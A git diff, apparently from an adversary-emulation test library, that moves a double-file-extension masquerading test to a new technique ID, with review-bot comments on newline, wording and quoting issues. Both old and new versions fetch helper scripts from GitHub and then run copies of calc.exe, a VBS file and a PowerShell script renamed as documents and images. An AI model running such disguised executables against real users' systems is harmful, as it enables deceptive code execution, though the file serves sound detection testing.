diff --git a/atomics/T1036.003/T1036.003.yaml b/atomics/T1036.003/T1036.003.yaml
index d2b155a515..c5b4147fe6 100644
--- a/atomics/T1036.003/T1036.003.yaml
+++ b/atomics/T1036.003/T1036.003.yaml
@@ -160,72 +160,4 @@ atomic_tests:
 del C:\T1036.003.txt >nul 2>&1
 del C:\lsm.exe >nul 2>&1
 name: command_prompt
- elevation_required: true
-- name: File Extension Masquerading
- auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
- description: |
- download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
-
- e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
- supported_platforms:
- - windows
- input_arguments:
- exe_path:
- description: path to exe to use when creating masquerading files
- type: path
- default: C:\Windows\System32\calc.exe
- vbs_path:
- description: path of vbs to use when creating masquerading files
- type: path
- default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs
- ps1_path:
- description: path of powershell script to use when creating masquerading files
- type: path
- default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1
- dependency_executor_name: powershell
- dependencies:
- - description: |
- File to copy must exist on disk at specified location (#{vbs_path})
- prereq_command: |
- if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
- get_prereq_command: |
- New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
- - description: |
- File to copy must exist on disk at specified location (#{ps1_path})
- prereq_command: |
- if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
- get_prereq_command: |
- New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
- executor:
- command: |
- copy "#{exe_path}" %temp%\T1036.003_masquerading.docx.exe /Y
- copy "#{exe_path}" %temp%\T1036.003_masquerading.pdf.exe /Y
- copy "#{exe_path}" %temp%\T1036.003_masquerading.ps1.exe /Y
- copy "#{vbs_path}" %temp%\T1036.003_masquerading.xls.vbs /Y
- copy "#{vbs_path}" %temp%\T1036.003_masquerading.xlsx.vbs /Y
- copy "#{vbs_path}" %temp%\T1036.003_masquerading.png.vbs /Y
- copy "#{ps1_path}" %temp%\T1036.003_masquerading.doc.ps1 /Y
- copy "#{ps1_path}" %temp%\T1036.003_masquerading.pdf.ps1 /Y
- copy "#{ps1_path}" %temp%\T1036.003_masquerading.rtf.ps1 /Y
- %temp%\T1036.003_masquerading.docx.exe
- %temp%\T1036.003_masquerading.pdf.exe
- %temp%\T1036.003_masquerading.ps1.exe
- %temp%\T1036.003_masquerading.xls.vbs
- %temp%\T1036.003_masquerading.xlsx.vbs
- %temp%\T1036.003_masquerading.png.vbs
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.doc.ps1
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.pdf.ps1
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.003_masquerading.rtf.ps1
- cleanup_command: |
- del /f %temp%\T1036.003_masquerading.docx.exe > nul 2>&1
- del /f %temp%\T1036.003_masquerading.pdf.exe > nul 2>&1
- del /f %temp%\T1036.003_masquerading.ps1.exe > nul 2>&1
- del /f %temp%\T1036.003_masquerading.xls.vbs > nul 2>&1
- del /f %temp%\T1036.003_masquerading.xlsx.vbs > nul 2>&1
- del /f %temp%\T1036.003_masquerading.png.vbs > nul 2>&1
- del /f %temp%\T1036.003_masquerading.doc.ps1 > nul 2>&1
- del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
- del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
- name: command_prompt
+ elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1036.007/T1036.007.yaml b/atomics/T1036.007/T1036.007.yaml
new file mode 100644
index 0000000000..86685ac946
--- /dev/null
+++ b/atomics/T1036.007/T1036.007.yaml
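Review bot: The new side of this hunk leaves T1036.003.yaml without a trailing newline (`\ No newline at end of file` follows `+  elevation_required: true`), where the old side ended the file with one; yamllint's `new-line-at-end-of-file` rule flags this, and the next test appended to the file will produce a needlessly noisy diff. Re-add the final newline so the file ends with exactly one. The test whose `elevation_required` line is kept here starts above the hunk.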
@@ -0,0 +1,71 @@
+attack_technique: T1036.007
+display_name: "Masquerading: Double File Extension"
+atomic_tests:
+ - name: File Extension Masquerading
+ auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+ description: |
+ download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
+
+ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
+ supported_platforms:
+ - windows
+ input_arguments:
+ exe_path:
+ description: path to exe to use when creating masquerading files
+ type: path
+ default: C:\Windows\System32\calc.exe
+ vbs_path:
+ description: path of vbs to use when creating masquerading files
+ type: path
+ default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.vbs
+ ps1_path:
+ description: path of powershell script to use when creating masquerading files
+ type: path
+ default: PathToAtomicsFolder\T1036.007\src\T1036.007_masquerading.ps1
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ File to copy must exist on disk at specified location (#{vbs_path})
+ prereq_command: |
+ if (Test-Path "#{vbs_path}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path "#{vbs_path}") -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.vbs" -OutFile "#{vbs_path}"
+ - description: |
+ File to copy must exist on disk at specified location (#{ps1_path})
+ prereq_command: |
+ if (Test-Path "#{ps1_path}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path "#{ps1_path}") -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.007/src/T1036.007_masquerading.ps1" -OutFile "#{ps1_path}"
+ executor:
+ command: |
+ copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
+ copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
+ copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
+ copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
+ copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
+ copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
+ copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
+ copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
+ copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
+ %temp%\T1036.007_masquerading.docx.exe
+ %temp%\T1036.007_masquerading.pdf.exe
+ %temp%\T1036.007_masquerading.ps1.exe
+ %temp%\T1036.007_masquerading.xls.vbs
+ %temp%\T1036.007_masquerading.xlsx.vbs
+ %temp%\T1036.007_masquerading.png.vbs
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
+ cleanup_command: |
+ del /f %temp%\T1036.007_masquerading.docx.exe > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.pdf.exe > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.ps1.exe > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.xls.vbs > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.xlsx.vbs > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.png.vbs > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.doc.ps1 > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.pdf.ps1 > nul 2>&1
+ del /f %temp%\T1036.007_masquerading.rtf.ps1 > nul 2>&1
+ name: command_prompt
diff --git a/atomics/T1036.003/src/T1036.003_masquerading.ps1 b/atomics/T1036.007/src/T1036.007_masquerading.ps1
similarity index 100%
rename from atomics/T1036.003/src/T1036.003_masquerading.ps1
rename to atomics/T1036.007/src/T1036.007_masquerading.ps1
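Review bot: The `description` in the new T1036.007.yaml undercounts what the executor does: it promises "3 calc instances and 3 vbs windows", but the `command` block also launches three PowerShell scripts (`.doc.ps1`, `.pdf.ps1`, `.rtf.ps1`) via `powershell.exe -File`, so the mismatch is carried over from the old T1036.003 test rather than fixed by the move; consider `Upon execution 3 calc instances, 3 vbs windows and 3 PowerShell script windows will be launched.` and correcting `Quartelyreport` to `Quarterlyreport`. Every `%temp%\T1036.007_masquerading.*` reference in `command` and `cleanup_command` is unquoted, so a TEMP path containing a space would break the `copy`, `powershell.exe -File` and `del` lines; the robust form is to quote the destination, e.g. `copy "#{exe_path}" "%temp%\T1036.007_masquerading.docx.exe" /Y`, and likewise for the other 26 references. For anyone using this test to validate detection coverage, note that `cleanup_command` only deletes the copied files and does not stop the processes they spawned, and its `> nul 2>&1` redirection would hide a `del` that fails because a copy is still in use; a short comment on the test saying so would save a surprised analyst some time.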
diff --git a/atomics/T1036.003/src/T1036.003_masquerading.vbs b/atomics/T1036.007/src/T1036.007_masquerading.vbs
similarity index 100%
rename from atomics/T1036.003/src/T1036.003_masquerading.vbs
rename to atomics/T1036.007/src/T1036.007_masquerading.vbs